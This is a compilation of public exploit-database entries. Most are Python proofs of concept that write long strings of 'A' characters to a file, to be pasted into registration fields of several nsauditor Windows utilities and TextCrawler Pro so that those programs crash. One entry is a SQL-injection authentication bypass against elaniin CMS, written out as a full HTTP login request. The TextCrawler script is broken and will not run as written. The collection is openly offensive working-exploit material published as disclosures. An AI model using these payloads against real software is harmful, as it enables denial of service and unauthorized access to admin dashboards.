# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NetShareWatcher 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.NetShareWatcher Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: elaniin CMS 1.0 - Authentication Bypass # Author: riamloo # Date: 2020-01-02 # Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ ) # Software Link: https://github.com/elaniin/CMS/archive/master.zip # Version: 1 # CVE: N/A # Tested on: Win 10 # Discription: # Open-source Content Management System created with PHP + MySQL https://elaniin.com/ # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/elaniin/login.php POST /elaniin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; Content-Length: 334 Referer: http://localhost/elaniin/login.php Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8 Connection: close Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install ShareAlarmPro 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.ShareAlarmPro Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Dnss 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.Dnss Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC) # Date: 2020-05-01 # Vendor Homepage:https://www.digitalvolcano.co.uk/index.html # Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe # Exploit Author: Achilles # Tested Version: 3.1.1 # Tested on: Windows 7 x64 # 1.- Run python code :TextCrawler.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open TextCrawler Pro # 4.- Paste the content of EVIL.txt into the Field: 'License key' # 5.- Click 'Activate' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install RemShutdown 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.RemShutdown Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Backup Key Recovery 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.Backup Key Recovery Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install RemShutdown 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.RemShutdown Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NBMonitor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.NBMonitor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotFTP 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotFTP Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")